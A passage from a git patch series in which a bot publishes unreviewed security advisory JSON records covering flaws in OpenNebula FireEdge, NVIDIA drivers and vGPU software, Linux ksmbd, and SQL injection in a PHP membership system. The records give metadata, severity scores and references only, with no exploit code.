"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8471" + }, + { + "type": "WEB", + "url": "https://github.com/tqlfront/CVE/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318521" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318521" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626115" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T19:15:25Z" + } +} \ No newline at end of file From 7b2890609874be2d554f13f3314047d382d9dfc3 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 00:32:02 +0000 Subject: [PATCH 316/323] Publish Advisories GHSA-236c-586c-7q48 GHSA-25cp-2qqr-6v8p GHSA-2729-wmg7-hchx GHSA-3hjh-cjx8-8c83 GHSA-58v5-wj5r-7vmx GHSA-6xf6-2p9f-2577 GHSA-8vfh-pg44-pprg GHSA-f97g-94hp-59h9 GHSA-fr49-r522-pmcp GHSA-gxcf-fvmv-78f7 GHSA-h7cw-8w5m-2f29 GHSA-mg2v-x7gv-c9jr GHSA-mqv4-xc9c-8q9q GHSA-ppcc-852j-px73 GHSA-q62g-686x-2rh3 GHSA-qmwr-6rr6-wj8m GHSA-wrxq-9fmf-hq5j --- .../GHSA-236c-586c-7q48.json | 52 +++++++++++++++++ .../GHSA-25cp-2qqr-6v8p.json | 36 ++++++++++++ .../GHSA-2729-wmg7-hchx.json | 36 ++++++++++++ .../GHSA-3hjh-cjx8-8c83.json | 48 ++++++++++++++++ .../GHSA-58v5-wj5r-7vmx.json | 36 ++++++++++++ .../GHSA-6xf6-2p9f-2577.json | 56 +++++++++++++++++++ .../GHSA-8vfh-pg44-pprg.json | 40 +++++++++++++ .../GHSA-f97g-94hp-59h9.json | 36 ++++++++++++ .../GHSA-fr49-r522-pmcp.json | 36 ++++++++++++ .../GHSA-gxcf-fvmv-78f7.json | 36 ++++++++++++ .../GHSA-h7cw-8w5m-2f29.json | 36 ++++++++++++ .../GHSA-mg2v-x7gv-c9jr.json | 56 +++++++++++++++++++ .../GHSA-mqv4-xc9c-8q9q.json | 36 ++++++++++++ .../GHSA-ppcc-852j-px73.json | 36 ++++++++++++ .../GHSA-q62g-686x-2rh3.json | 36 ++++++++++++ .../GHSA-qmwr-6rr6-wj8m.json | 36 ++++++++++++ .../GHSA-wrxq-9fmf-hq5j.json | 36 ++++++++++++ 17 files changed, 684 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-236c-586c-7q48/GHSA-236c-586c-7q48.json create mode 100644 advisories/unreviewed/2025/08/GHSA-25cp-2qqr-6v8p/GHSA-25cp-2qqr-6v8p.json create mode 100644 advisories/unreviewed/2025/08/GHSA-2729-wmg7-hchx/GHSA-2729-wmg7-hchx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-3hjh-cjx8-8c83/GHSA-3hjh-cjx8-8c83.json create mode 100644 advisories/unreviewed/2025/08/GHSA-58v5-wj5r-7vmx/GHSA-58v5-wj5r-7vmx.json create mode 100644 advisories/unreviewed/2025/08/GHSA-6xf6-2p9f-2577/GHSA-6xf6-2p9f-2577.json create mode 100644 advisories/unreviewed/2025/08/GHSA-8vfh-pg44-pprg/GHSA-8vfh-pg44-pprg.json create mode 100644 advisories/unreviewed/2025/08/GHSA-f97g-94hp-59h9/GHSA-f97g-94hp-59h9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-fr49-r522-pmcp/GHSA-fr49-r522-pmcp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-gxcf-fvmv-78f7/GHSA-gxcf-fvmv-78f7.json create mode 100644 advisories/unreviewed/2025/08/GHSA-h7cw-8w5m-2f29/GHSA-h7cw-8w5m-2f29.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mg2v-x7gv-c9jr/GHSA-mg2v-x7gv-c9jr.json create mode 100644 advisories/unreviewed/2025/08/GHSA-mqv4-xc9c-8q9q/GHSA-mqv4-xc9c-8q9q.json create mode 100644 advisories/unreviewed/2025/08/GHSA-ppcc-852j-px73/GHSA-ppcc-852j-px73.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q62g-686x-2rh3/GHSA-q62g-686x-2rh3.json create mode 100644 advisories/unreviewed/2025/08/GHSA-qmwr-6rr6-wj8m/GHSA-qmwr-6rr6-wj8m.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wrxq-9fmf-hq5j/GHSA-wrxq-9fmf-hq5j.json diff --git a/advisories/unreviewed/2025/08/GHSA-236c-586c-7q48/GHSA-236c-586c-7q48.json b/advisories/unreviewed/2025/08/GHSA-236c-586c-7q48/GHSA-236c-586c-7q48.json new file mode 100644 index 0000000000000..aca2d3196cea7 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-236c-586c-7q48/GHSA-236c-586c-7q48.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-236c-586c-7q48", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-54955" + ], + "details": "OpenNebula Community Edition (CE) before 7.0.0 and Enterprise Edition (EE) before 6.10.3 have a critical FireEdge race condition that can lead to full account takeover. By exploiting this, an unauthenticated attacker can obtain a valid JSON Web Token (JWT) belonging to a legitimate user without knowledge of their credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54955" + }, + { + "type": "WEB", + "url": "https://github.com/OpenNebula/one/commit/81058d9705e7ac619d294423de28b76d88f613b6" + }, + { + "type": "WEB", + "url": "https://docs.opennebula.io/6.10/intro_release_notes/release_notes_enterprise/resolved_issues_6103.html" + }, + { + "type": "WEB", + "url": "https://github.com/OpenNebula/one" + }, + { + "type": "WEB", + "url": "https://github.com/OpenNebula/one/releases/tag/release-7.0.0" + }, + { + "type": "WEB", + "url": "https://github.com/Stolichnayer/OpenNebula-Account-Takeover" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T00:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-25cp-2qqr-6v8p/GHSA-25cp-2qqr-6v8p.json b/advisories/unreviewed/2025/08/GHSA-25cp-2qqr-6v8p/GHSA-25cp-2qqr-6v8p.json new file mode 100644 index 0000000000000..7e8d62e1d0b75 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-25cp-2qqr-6v8p/GHSA-25cp-2qqr-6v8p.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-25cp-2qqr-6v8p", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-23290" + ], + "details": "NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a guest could get global GPU metrics which may be influenced by work in other VMs. A successful exploit of this vulnerability might lead to information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23290" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-2729-wmg7-hchx/GHSA-2729-wmg7-hchx.json b/advisories/unreviewed/2025/08/GHSA-2729-wmg7-hchx/GHSA-2729-wmg7-hchx.json new file mode 100644 index 0000000000000..b823d784c8f9b --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-2729-wmg7-hchx/GHSA-2729-wmg7-hchx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2729-wmg7-hchx", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2025-23281" + ], + "details": "NVIDIA GPU Display Driver for Windows contains a vulnerability where an attacker with local unprivileged access that can win a race condition might be able to trigger a use-after-free error. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, data tampering, denial of service, or information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23281" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-3hjh-cjx8-8c83/GHSA-3hjh-cjx8-8c83.json b/advisories/unreviewed/2025/08/GHSA-3hjh-cjx8-8c83/GHSA-3hjh-cjx8-8c83.json new file mode 100644 index 0000000000000..b227fa6bcf670 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-3hjh-cjx8-8c83/GHSA-3hjh-cjx8-8c83.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3hjh-cjx8-8c83", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2023-32255" + ], + "details": "A flaw was found in the Linux kernel's ksmbd component. A memory leak can occur if a client sends a session setup request with an unknown NTLMSSP message type, potentially leading to resource exhaustion.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32255" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-32255" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2385884" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6d7cb549c2ca20e1f07593f15e936fd54b763028" + }, + { + "type": "WEB", + "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-703" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-772" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-58v5-wj5r-7vmx/GHSA-58v5-wj5r-7vmx.json b/advisories/unreviewed/2025/08/GHSA-58v5-wj5r-7vmx/GHSA-58v5-wj5r-7vmx.json new file mode 100644 index 0000000000000..6d1a72f20a33d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-58v5-wj5r-7vmx/GHSA-58v5-wj5r-7vmx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-58v5-wj5r-7vmx", + "modified": "2025-08-03T00:30:23Z", + "published": "2025-08-03T00:30:23Z", + "aliases": [ + "CVE-2025-23278" + ], + "details": "NVIDIA Display Driver for Windows and Linux contains a vulnerability where an attacker might cause an improper index validation by issuing a call with crafted parameters. A successful exploit of this vulnerability might lead to data tampering  or denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23278" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-6xf6-2p9f-2577/GHSA-6xf6-2p9f-2577.json b/advisories/unreviewed/2025/08/GHSA-6xf6-2p9f-2577/GHSA-6xf6-2p9f-2577.json new file mode 100644 index 0000000000000..fb0ea92770740 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-6xf6-2p9f-2577/GHSA-6xf6-2p9f-2577.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xf6-2p9f-2577", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-8493" + ], + "details": "A vulnerability classified as critical was found in code-projects Intern Membership Management System 1.0. This vulnerability affects unknown code of the file /admin/edit_student_query.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8493" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318592" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318592" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626716" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/gongzi-jsnek/xb2q3a/dpgm5r79h1o8mp1b?singleDoc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-8vfh-pg44-pprg/GHSA-8vfh-pg44-pprg.json b/advisories/unreviewed/2025/08/GHSA-8vfh-pg44-pprg/GHSA-8vfh-pg44-pprg.json new file mode 100644 index 0000000000000..39e9ebb29c6f5 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-8vfh-pg44-pprg/GHSA-8vfh-pg44-pprg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8vfh-pg44-pprg", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2023-32253" + ], + "details": "A flaw was found in the Linux kernel's ksmbd component. A deadlock is triggered by sending multiple concurrent session setup requests, possibly leading to a denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32253" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-32253" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2385886" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-413" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-f97g-94hp-59h9/GHSA-f97g-94hp-59h9.json b/advisories/unreviewed/2025/08/GHSA-f97g-94hp-59h9/GHSA-f97g-94hp-59h9.json new file mode 100644 index 0000000000000..42ab665e869a4 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-f97g-94hp-59h9/GHSA-f97g-94hp-59h9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f97g-94hp-59h9", + "modified": "2025-08-03T00:30:23Z", + "published": "2025-08-03T00:30:23Z", + "aliases": [ + "CVE-2025-23276" + ], + "details": "NVIDIA Installer for Windows contains a vulnerability where an attacker may be able to escalate privileges. A successful exploit of this vulnerability may lead to escalation of privileges, denial of service, code execution, information disclosure and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23276" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-552" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-fr49-r522-pmcp/GHSA-fr49-r522-pmcp.json b/advisories/unreviewed/2025/08/GHSA-fr49-r522-pmcp/GHSA-fr49-r522-pmcp.json new file mode 100644 index 0000000000000..e0a42a9d07f3d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-fr49-r522-pmcp/GHSA-fr49-r522-pmcp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fr49-r522-pmcp", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-23284" + ], + "details": "NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause a stack buffer overflow. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, or data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23284" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-gxcf-fvmv-78f7/GHSA-gxcf-fvmv-78f7.json b/advisories/unreviewed/2025/08/GHSA-gxcf-fvmv-78f7/GHSA-gxcf-fvmv-78f7.json new file mode 100644 index 0000000000000..7ca2c6c6d3bcf --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gxcf-fvmv-78f7/GHSA-gxcf-fvmv-78f7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gxcf-fvmv-78f7", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2025-23287" + ], + "details": "NVIDIA GPU Display Driver for Windows contains a vulnerability where an attacker may access sensitive system-level information. A successful exploit of this vulnerability may lead to Information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23287" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-h7cw-8w5m-2f29/GHSA-h7cw-8w5m-2f29.json b/advisories/unreviewed/2025/08/GHSA-h7cw-8w5m-2f29/GHSA-h7cw-8w5m-2f29.json new file mode 100644 index 0000000000000..c0fbaf862eb51 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-h7cw-8w5m-2f29/GHSA-h7cw-8w5m-2f29.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h7cw-8w5m-2f29", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-23285" + ], + "details": "NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager, where it allows a guest to access global resources. A successful exploit of this vulnerability might lead to denial of service.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23285" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mg2v-x7gv-c9jr/GHSA-mg2v-x7gv-c9jr.json b/advisories/unreviewed/2025/08/GHSA-mg2v-x7gv-c9jr/GHSA-mg2v-x7gv-c9jr.json new file mode 100644 index 0000000000000..fb4d236e66d72 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mg2v-x7gv-c9jr/GHSA-mg2v-x7gv-c9jr.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mg2v-x7gv-c9jr", + "modified": "2025-08-03T00:30:25Z", + "published": "2025-08-03T00:30:25Z", + "aliases": [ + "CVE-2025-8494" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Intern Membership Management System 1.0. This issue affects some unknown processing of the file /admin/delete_student.php. The manipulation of the argument ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8494" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318593" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318593" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626721" + }, + { + "type": "WEB", + "url": "https://www.yuque.com/gongzi-jsnek/xb2q3a/ckkctkqfirwk2bsd?singleDoc#" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T00:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-mqv4-xc9c-8q9q/GHSA-mqv4-xc9c-8q9q.json b/advisories/unreviewed/2025/08/GHSA-mqv4-xc9c-8q9q/GHSA-mqv4-xc9c-8q9q.json new file mode 100644 index 0000000000000..9260d72ca90b0 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-mqv4-xc9c-8q9q/GHSA-mqv4-xc9c-8q9q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mqv4-xc9c-8q9q", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2025-23288" + ], + "details": "NVIDIA GPU Display Driver for Windows contains a vulnerability  where an attacker may cause an exposure of sensitive system information with local unprivileged system access. A successful exploit of this vulnerability may lead to Information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23288" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-ppcc-852j-px73/GHSA-ppcc-852j-px73.json b/advisories/unreviewed/2025/08/GHSA-ppcc-852j-px73/GHSA-ppcc-852j-px73.json new file mode 100644 index 0000000000000..70a8700c8dd55 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-ppcc-852j-px73/GHSA-ppcc-852j-px73.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ppcc-852j-px73", + "modified": "2025-08-03T00:30:23Z", + "published": "2025-08-03T00:30:23Z", + "aliases": [ + "CVE-2025-23279" + ], + "details": "NVIDIA .run Installer for Linux and Solaris contains a vulnerability where an attacker could use a race condition to escalate privileges. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, denial of service, or data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23279" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:44Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q62g-686x-2rh3/GHSA-q62g-686x-2rh3.json b/advisories/unreviewed/2025/08/GHSA-q62g-686x-2rh3/GHSA-q62g-686x-2rh3.json new file mode 100644 index 0000000000000..4dbb1a4a7286f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q62g-686x-2rh3/GHSA-q62g-686x-2rh3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q62g-686x-2rh3", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2025-23283" + ], + "details": "NVIDIA vGPU software for Linux-style hypervisors contains a vulnerability in the Virtual GPU Manager, where a malicious guest could cause stack buffer overflow. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23283" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-02T22:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-qmwr-6rr6-wj8m/GHSA-qmwr-6rr6-wj8m.json b/advisories/unreviewed/2025/08/GHSA-qmwr-6rr6-wj8m/GHSA-qmwr-6rr6-wj8m.json new file mode 100644 index 0000000000000..17c8a4358199d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-qmwr-6rr6-wj8m/GHSA-qmwr-6rr6-wj8m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmwr-6rr6-wj8m", + "modified": "2025-08-03T00:30:24Z", + "published": "2025-08-03T00:30:24Z", + "aliases": [ + "CVE-2025-23286" + ], + "details": "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where an attacker could read invalid memory. A successful exploit of this vulnerability might lead to information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23286" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5670" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + 